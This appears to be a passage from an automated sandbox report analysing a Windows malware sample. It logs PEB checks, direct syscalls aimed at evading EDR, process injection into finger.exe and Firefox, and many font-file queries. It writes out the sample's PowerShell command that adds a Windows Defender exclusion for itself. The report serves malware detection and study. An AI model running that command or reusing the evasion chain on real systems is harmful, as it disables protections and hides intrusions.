                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFCA6F mov eax, dword ptr fs:[00000030h]4_2_00FFCA6F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFCA6F mov eax, dword ptr fs:[00000030h]4_2_00FFCA6F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFCA6F mov eax, dword ptr fs:[00000030h]4_2_00FFCA6F
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0A5B mov eax, dword ptr fs:[00000030h]4_2_00FD0A5B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0A5B mov eax, dword ptr fs:[00000030h]4_2_00FD0A5B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6A50 mov eax, dword ptr fs:[00000030h]4_2_00FC6A50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6A50 mov eax, dword ptr fs:[00000030h]4_2_00FC6A50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6A50 mov eax, dword ptr fs:[00000030h]4_2_00FC6A50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6A50 mov eax, dword ptr fs:[00000030h]4_2_00FC6A50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6A50 mov eax, dword ptr fs:[00000030h]4_2_00FC6A50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6A50 mov eax, dword ptr fs:[00000030h]4_2_00FC6A50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC6A50 mov eax, dword ptr fs:[00000030h]4_2_00FC6A50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01074BB0 mov eax, dword ptr fs:[00000030h]4_2_01074BB0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01074BB0 mov eax, dword ptr fs:[00000030h]4_2_01074BB0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE4A35 mov eax, dword ptr fs:[00000030h]4_2_00FE4A35
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE4A35 mov eax, dword ptr fs:[00000030h]4_2_00FE4A35
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEEA2E mov eax, dword ptr fs:[00000030h]4_2_00FEEA2E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106EBD0 mov eax, dword ptr fs:[00000030h]4_2_0106EBD0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFCA24 mov eax, dword ptr fs:[00000030h]4_2_00FFCA24
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104CBF0 mov eax, dword ptr fs:[00000030h]4_2_0104CBF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEEBFC mov eax, dword ptr fs:[00000030h]4_2_00FEEBFC
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8BF0 mov eax, dword ptr fs:[00000030h]4_2_00FC8BF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8BF0 mov eax, dword ptr fs:[00000030h]4_2_00FC8BF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8BF0 mov eax, dword ptr fs:[00000030h]4_2_00FC8BF0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104CA11 mov eax, dword ptr fs:[00000030h]4_2_0104CA11
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0BCD mov eax, dword ptr fs:[00000030h]4_2_00FC0BCD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0BCD mov eax, dword ptr fs:[00000030h]4_2_00FC0BCD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0BCD mov eax, dword ptr fs:[00000030h]4_2_00FC0BCD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE0BCB mov eax, dword ptr fs:[00000030h]4_2_00FE0BCB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE0BCB mov eax, dword ptr fs:[00000030h]4_2_00FE0BCB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE0BCB mov eax, dword ptr fs:[00000030h]4_2_00FE0BCB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0BBE mov eax, dword ptr fs:[00000030h]4_2_00FD0BBE
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0BBE mov eax, dword ptr fs:[00000030h]4_2_00FD0BBE
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106EA60 mov eax, dword ptr fs:[00000030h]4_2_0106EA60
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103CA72 mov eax, dword ptr fs:[00000030h]4_2_0103CA72
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103CA72 mov eax, dword ptr fs:[00000030h]4_2_0103CA72
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeMemory written: C:\Users\user\Desktop\QmBbqpEHu0.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: NULL target: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeSection loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\finger.exeThread register set: target process: 7344Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\finger.exeThread APC queued: target process: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeProcess created: C:\Users\user\Desktop\QmBbqpEHu0.exe "C:\Users\user\Desktop\QmBbqpEHu0.exe"Jump to behavior
                Source: C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: cqvjCApYGBKzop.exe, 00000009.00000002.3587312043.0000000001C01000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000000.2186073136.0000000001C00000.00000002.00000001.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3587711896.0000000001901000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Users\user\Desktop\QmBbqpEHu0.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
